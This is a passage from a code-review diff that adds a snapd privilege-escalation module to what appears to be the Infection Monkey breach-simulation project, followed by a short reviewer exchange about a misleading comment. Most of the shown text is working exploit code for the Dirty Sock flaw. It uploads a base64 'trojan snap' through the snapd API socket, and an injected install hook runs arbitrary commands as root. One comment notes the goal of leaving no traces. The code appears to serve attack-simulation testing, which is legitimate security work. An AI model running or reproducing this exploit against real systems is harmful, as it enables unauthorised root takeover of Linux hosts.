monkey/infection_monkey/pe/actions/snapd.py

```diff
@@ -0,0 +1,302 @@
+--------------------------f8c156143a1caf97
+Content-Disposition: form-data; name="devmode"
+
+true
+--------------------------f8c156143a1caf97
+Content-Disposition: form-data; name="snap"; filename="snap.snap"
+Content-Type: application/octet-stream
+
+''' + blob.decode('latin-1') + '''
+--------------------------f8c156143a1caf97--'''
+
+    # Multi-part forum uploads are weird. First, we post the headers
+    # and wait for an HTTP 100 reply. THEN we can send the payload.
+    http_req1 = ('POST /v2/snaps HTTP/1.1\r\n'
+                 'Host: localhost\r\n'
+                 'Content-Type: multipart/form-data; boundary='
+                 + boundary + '\r\n'
+                 'Expect: 100-continue\r\n'
+                 'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n')
+
+    # Send the headers to the snap API
+    LOG.info("[+] Installing the trojan snap (and sleeping 8 seconds)...")
+    client_sock.sendall(http_req1.encode("utf-8"))
+
+    # Receive the initial HTTP/1.1 100 Continue reply
+    http_reply = client_sock.recv(8192).decode("utf-8")
+
+    if 'HTTP/1.1 100 Continue' not in http_reply:
+        LOG.info("[!] Error starting POST conversation, here is the reply:\n")
+        # LOG.info(http_reply) debug output
+        return False
+
+    # Now we can send the payload
+    http_req2 = post_payload
+    client_sock.sendall(http_req2.encode("latin-1"))
+
+    # Receive the data and extract the JSON
+    http_reply = client_sock.recv(8192).decode("utf-8")
+
+    # Exit on failure
+    if 'status-code":202' not in http_reply:
+        LOG.info("[!] Did not work, here is the API reply:\n\n")
+        LOG.info(http_reply)  #debug output
+        return False
+
+    # Sleep to allow time for the snap to install correctly. Otherwise,
+    # The uninstall that follows will fail, leaving unnecessary traces
+    # on the machine.
+
+    time.sleep(SLEEP)
+    return True
+
+
+def run_command_as_root(command):
+    """
+    This function takes in the command and runs them as root
+    if the pe is successful
+    :param command: Command to be run as root
+    :return: True if the Pe is successful
+    """
+    global TROJAN_BASE_SNAP
+    command = command + APPEND_COMMENT
+    index = PLACEHOLDER_OFFSET + len(command)
+    trojan_base_snap_decode = TROJAN_BASE_SNAP.decode('base64')
+
+    # Create a snap application with out command as the install hook
+    trojan_snap = base64.b64encode("".join(
+        (trojan_base_snap_decode[:PLACEHOLDER_OFFSET], command, trojan_base_snap_decode[index:])))
+
+    # Create a random name for the dirty socket file
+    sockfile = create_sockfile()
+
+    # Bind the dirty socket to the snapdapi
+    client_sock = bind_sock(sockfile)
+    if not client_sock:
+        return False
+
+    # Delete trojan snap, in case there was a previous install attempt
+    if not delete_snap(client_sock):
+        return False
+
+    # Install the trojan snap, which has an install hook that creates a user
```

Comment:
Wrong comment, you imply that the only thing it does is create a user

Reply:
Ah! Nice catch.